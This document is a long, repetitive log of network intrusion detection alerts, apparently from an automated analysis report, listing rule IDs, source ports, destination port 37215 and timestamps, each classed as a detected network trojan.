                SID:2835222
                Source Port:33310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994348
                SID:2835222
                Source Port:44030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333649
                SID:2835222
                Source Port:35540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160083
                SID:2829579
                Source Port:53848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265363
                SID:2835222
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010877
                SID:2829579
                Source Port:40404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162845
                SID:2835222
                Source Port:42666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369949
                SID:2835222
                Source Port:43912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941389
                SID:2829579
                Source Port:48250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.437224
                SID:2835222
                Source Port:46636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672563
                SID:2829579
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265909
                SID:2829579
                Source Port:49134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844268
                SID:2835222
                Source Port:39342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561015
                SID:2829579
                Source Port:45454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839821
                SID:2829579
                Source Port:57378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967543
                SID:2835222
                Source Port:37180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008532
                SID:2835222
                Source Port:52056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931322
                SID:2835222
                Source Port:43614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814529
                SID:2829579
                Source Port:47544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957619
                SID:2829579
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277653
                SID:2835222
                Source Port:49534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964672
                SID:2835222
                Source Port:42874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795714
                SID:2835222
                Source Port:36692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574076
                SID:2835222
                Source Port:38666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189981
                SID:2829579
                Source Port:36572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559656
                SID:2835222
                Source Port:60178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220727
                SID:2829579
                Source Port:51272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958491
                SID:2829579
                Source Port:44604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583822
                SID:2829579
                Source Port:44074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431214
                SID:2835222
                Source Port:37730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381817
                SID:2835222
                Source Port:43402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771026
                SID:2835222
                Source Port:36672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417153
                SID:2829579
                Source Port:36208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267843
                SID:2835222
                Source Port:45048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281361
                SID:2835222
                Source Port:46034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597460
                SID:2835222
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022127
                SID:2829579
                Source Port:55268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417877
                SID:2829579
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173496
                SID:2829579
                Source Port:56962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916120
                SID:2835222
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025127
                SID:2835222
                Source Port:58000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799791
                SID:2835222
                Source Port:46604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840113
                SID:2835222
                Source Port:42758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946339
                SID:2835222
                Source Port:58242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726077
                SID:2835222
                Source Port:46690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702366
                SID:2835222
                Source Port:37292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813163
                SID:2835222
                Source Port:42072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226828
                SID:2829579
                Source Port:54614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076356
                SID:2829579
                Source Port:49176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652511
                SID:2829579
                Source Port:43536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418039
                SID:2829579
                Source Port:39858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572887
                SID:2829579
                Source Port:49162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900247
                SID:2835222
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915508
                SID:2829579
                Source Port:34178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889860
                SID:2829579
                Source Port:36380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231467
                SID:2829579
                Source Port:60032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986831
                SID:2829579
                Source Port:45092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209950
                SID:2835222
                Source Port:47256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713767
                SID:2835222
                Source Port:53794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421449
                SID:2829579
                Source Port:58150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885479
                SID:2835222
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277610
                SID:2829579
                Source Port:44916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450870
                SID:2835222
                Source Port:43888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519824
                SID:2835222
                Source Port:39722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805850
                SID:2829579
                Source Port:49638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080568
                SID:2829579
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.095639
                SID:2829579
                Source Port:56288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136215
                SID:2835222
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335527
                SID:2829579
                Source Port:44636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675367
                SID:2835222
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799566
                SID:2835222
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813196
                SID:2835222
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442728
                SID:2835222
                Source Port:56070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264589
                SID:2835222
                Source Port:33846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863505
                SID:2829579
                Source Port:47418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945799
                SID:2835222
                Source Port:59388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915142
                SID:2829579
                Source Port:49736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899422
                SID:2829579
                Source Port:56626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848936
                SID:2829579
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886107
                SID:2829579
                Source Port:60870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015362
                SID:2829579
                Source Port:48880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036916
                SID:2835222
                Source Port:43936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739169
                SID:2829579
                Source Port:49818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795014
                SID:2829579
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.898229
                SID:2835222
                Source Port:33986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178985
                SID:2835222
                Source Port:60150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419811
                SID:2835222
                Source Port:34160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463557
                SID:2829579
                Source Port:59046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848252
                SID:2835222
                Source Port:48014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631411
                SID:2829579
                Source Port:35434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773659
                SID:2829579
                Source Port:53346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977185
                SID:2835222
                Source Port:58934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515727
                SID:2829579
                Source Port:59044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088527
                SID:2835222
                Source Port:48346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.041948
                SID:2835222
                Source Port:43486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273658
                SID:2835222
                Source Port:44752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948732
                SID:2835222
                Source Port:51514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969769
                SID:2829579
                Source Port:44960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667880
                SID:2835222
                Source Port:50728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224686
                SID:2835222
                Source Port:36246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523961
                SID:2829579
                Source Port:49378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948863
                SID:2829579
                Source Port:55634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873030
                SID:2829579
                Source Port:47458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270367
                SID:2835222
                Source Port:34698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461507
                SID:2835222
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651771
                SID:2829579
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.570819
                SID:2835222
                Source Port:35406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958737
                SID:2835222
                Source Port:53446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559293
                SID:2835222
                Source Port:56646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663398
                SID:2829579
                Source Port:35282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589386
                SID:2835222
                Source Port:52482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224392
                SID:2835222
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694584
                SID:2835222
                Source Port:52850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840418
                SID:2829579
                Source Port:59342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919476
                SID:2835222
                Source Port:56364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672431
                SID:2835222
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870505
                SID:2835222
                Source Port:45780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132728
                SID:2829579
                Source Port:59858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946170
                SID:2829579
                Source Port:44914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771153
                SID:2835222
                Source Port:34042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956233
                SID:2829579
                Source Port:36924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655962
                SID:2835222
                Source Port:46826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339200
                SID:2829579
                Source Port:32850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498577
                SID:2829579
                Source Port:46998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617629
                SID:2835222
                Source Port:59882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688896
                SID:2835222
                Source Port:49716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812932
                SID:2835222
                Source Port:34246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450888
                SID:2829579
                Source Port:47168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660306
                SID:2835222
                Source Port:43408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612324
                SID:2829579
                Source Port:58698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001286
                SID:2829579
                Source Port:47426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506104
                SID:2835222
                Source Port:33578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572658
                SID:2835222
                Source Port:38356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223050
                SID:2829579
                Source Port:50184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843846
                SID:2835222
                Source Port:50988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670738
                SID:2829579
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520437
                SID:2835222
                Source Port:50666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617691
                SID:2835222
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944687
                SID:2829579
                Source Port:33070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558141
                SID:2835222
                Source Port:58044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586248
                SID:2835222
                Source Port:53136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037819
                SID:2829579
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810549
                SID:2829579
                Source Port:48258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982014
                SID:2829579
                Source Port:46488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860229
                SID:2829579
                Source Port:57668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417617
                SID:2835222
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644970
                SID:2829579
                Source Port:59486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335190
                SID:2835222
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666727
                SID:2829579
                Source Port:60674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819001
                SID:2835222
                Source Port:41606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989923
                SID:2829579
                Source Port:58870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166310
                SID:2829579
                Source Port:40504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180286
                SID:2829579
                Source Port:39352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.440122
                SID:2835222
                Source Port:54328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900985
                SID:2829579
                Source Port:41642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948443
                SID:2835222
                Source Port:48608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013620
                SID:2835222
                Source Port:51058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718382
                SID:2835222
                Source Port:60914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732824
                SID:2835222
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942572
                SID:2829579
                Source Port:54586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994633
                SID:2829579
                Source Port:45236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435772
                SID:2829579
                Source Port:53152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793657
                SID:2829579
                Source Port:47290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521659
                SID:2829579
                Source Port:58114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854144
                SID:2835222
                Source Port:36110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212116
                SID:2835222
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022093
                SID:2829579
                Source Port:49380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716097
                SID:2829579
                Source Port:59540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419303
                SID:2835222
                Source Port:33922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334671
                SID:2829579
                Source Port:60406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559963
                SID:2835222
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718534
                SID:2835222
                Source Port:55530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783285
                SID:2835222
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101435
                SID:2835222
                Source Port:56160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942815
                SID:2835222
                Source Port:52152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665986
                SID:2829579
                Source Port:54068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666288
                SID:2835222
                Source Port:52876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.740062
                SID:2835222
                Source Port:51590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977950
                SID:2829579
                Source Port:56106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688065
                SID:2835222
                Source Port:42246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931142
                SID:2829579
                Source Port:44546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586142
                SID:2835222
                Source Port:45138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465551
                SID:2829579
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579431
                SID:2835222
                Source Port:39540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929749
                SID:2829579
                Source Port:52038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518897
                SID:2835222
                Source Port:44600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783121
                SID:2835222
                Source Port:36776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235312
                SID:2829579
                Source Port:34620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638872
                SID:2829579
                Source Port:52506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766828
                SID:2835222
                Source Port:39300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893663
                SID:2829579
                Source Port:45950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824640
                SID:2829579
                Source Port:59868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688984
                SID:2835222
                Source Port:56200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944969
                SID:2829579
                Source Port:49096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987230
                SID:2835222
                Source Port:37472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266043
                SID:2829579
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959245
                SID:2835222
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177016
                SID:2835222
                Source Port:43860
                Destination Port:37215
